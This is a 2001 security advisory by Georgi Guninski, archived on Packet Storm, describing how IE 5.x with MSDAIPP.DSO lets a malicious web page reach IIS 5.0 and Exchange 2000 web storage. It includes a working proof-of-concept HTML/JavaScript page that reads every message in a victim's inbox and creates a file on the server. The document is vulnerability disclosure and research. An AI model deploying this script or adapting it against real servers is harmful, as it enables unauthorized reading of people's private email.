exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iemsdaipp.txt

iemsdaipp.txt
Posted Mar 30, 2001
Authored by Georgi Guninski | Site guninski.com

Georgi Guninski security advisory #40 - Security bugs in interactions between IE 5.x, IIS 5.0 and Exchange 2000. If a malicious web page is browsed with IE it is possible to list the directories of arbitrary IIS 5.0 servers to which the browsing user has access. Under certain circumstances it is also possible to read the user's email or folders if it is stored on an Exchange 2000 server with web storage (it uses IIS 5.0). It is also possible to create (or probably modify) files on the Exchange 2000 server with web storage. Example exploit included.

tags | exploit, web, arbitrary
SHA-256 | 205a751214009b7efd4735ff3f131ee63a782759f29f253d522602889ff54916

iemsdaipp.txt

Change Mirror Download
   guninski@guninski.com Georgi Guninski security advisory #40, 2001

Security bugs in interactions between IE 5.x, IIS 5.0 and Exchange 2000

Systems affected:
The bug is in IE 5.x (Win2K, probably others) but interaction with IIS 5.0 (or Exchange web
storage) is required

Risk: High
Date: 28 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The information in this advisory is believed to be true based on experiments though it may be
false.
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
If a malicous web page is browsed with IE it is possible to list the directories of arbitrary
IIS 5.0 servers
to which the browsing user has access. Under certain circumtances it is also possible to read
the
user's email or folders if it is stored on an Exchange 2000 server with web storage (it uses
IIS 5.0).
It is also possible to create (or probably modify) files on the Exchange 2000 server with web
storage.

Details:

This is a complex problem and I am really busy to write lengthy advisory.
The probem seems to be "Microsoft OLE DB Provider for Internet Publishing" (MSDAIPP.DSO).
Basically it gives scripting interface for accessing and manipulating object on IIS 5.0 or
web storage.
The problem is it allows connecting to arbitrary servers, not only to the server from which
the html page is loaded.
Which is worse, if the IIS 5.0 is in "Local intranet zone" IE by default automatically
authenticates to it
without prompting the user.

Here is Microsoft's response to my initial report to them
(I sent them a similiar and earlier version of the example bellow)
-----------------------------------------------------------------------------
From: "Microsoft Security Response Center" <secure@microsoft.com>
Hello Georgi,

Thanks for your note. We would appreciate a little more detail as to
what you think can be done with this. If at all possible please lay out
all the parameters when you do go public so you are not just scaring
people with your rankings. Not sure how you can actually exploit this
especially in e-mail in restricted sites zone with all scripting turned
off. Visiting malicious web sites is not real exploit scenario and if
the Intranet zone which is a trusted zone is locked down what can you
do?
.............
-----------------------------------------------------------------------------

So here is an example.

The following example msdaippdemo.html works for me, don't know for you, let me know if it
does not work.
msdaippdemo.html may reside anywhere on the internet.
It contains two "variables" that must be changed - INTRASERVER and USERNAME.
If msdaipp.html is browsed with IE 5.x by user USERNAME (in NT DOMAIN) and INTRASERVER is IIS
5.0 with Exchange 2000 with web storage
(note: INTRASERVER must be a name which is in the "Local intranet zone" in the context of
USERNAME)
then an attacker may obtain all the messages in USERNAME's inbox and send them to arbitrary
server and in addition a
file "newlycreatedfile.html" shall be created in USERNAME's inbox.
In order the attack to succeed the attacker must know the names INTRASERVER and USERNAME (and
change them in msdaippdemo.html)
But if the attacker is insider in the NT DOMAIN he knows both of them, so basically it
allows playing with other people's Exchange 2000 with web storage mailboxes.
If INTRASERVER is running just plain IIS 5.0 with Indexing service enabled a directory
listing shall be obtained
if you edit the example a little - change "Data Source=http://INTRASERVER/"
--msdaippdemo.html-------------------------------------------------------------
<HTML>
Written by Georgi Guninski
<SCRIPT>
function f()
{
conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox';
//change INTRASERVER and USERNAME with real values
rec=new ActiveXObject("ADODB.Record");
conn.Open();
rs=new ActiveXObject("ADODB.Recordset");
rs.Open("SELECT * from SCOPE()",conn);
win=window.open("about:blank");
win.document.open();
// DISPLAYS ALL MESSAGES FROM USER'S INBOX
while (!rs.EOF)
{
for(i=0;i<rs.Fields.Count;i++)
{
win.document.writeln(rs.Fields(i).Name+"="+rs.Fields(i).Value+"<BR>");
}
rs.MoveNext();
}
rec.Open ("newlycreatedfile.html",conn,3,0);
//create file newlycreatedfile.html
win.document.close();
}
setTimeout("f()",1000);
</SCRIPT>
</HTML>
---------------------------------------------------------------

Workaround: To solve this particular issue disable Active Scripting, though I do not
recommend using IE for browsing
the Internet because this is dangerous.

Note: secure@microsoft.com wrote "Visiting malicious web sites is not real exploit scenario"

Vendor status:
Microsoft was informed on 22 March 2001
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close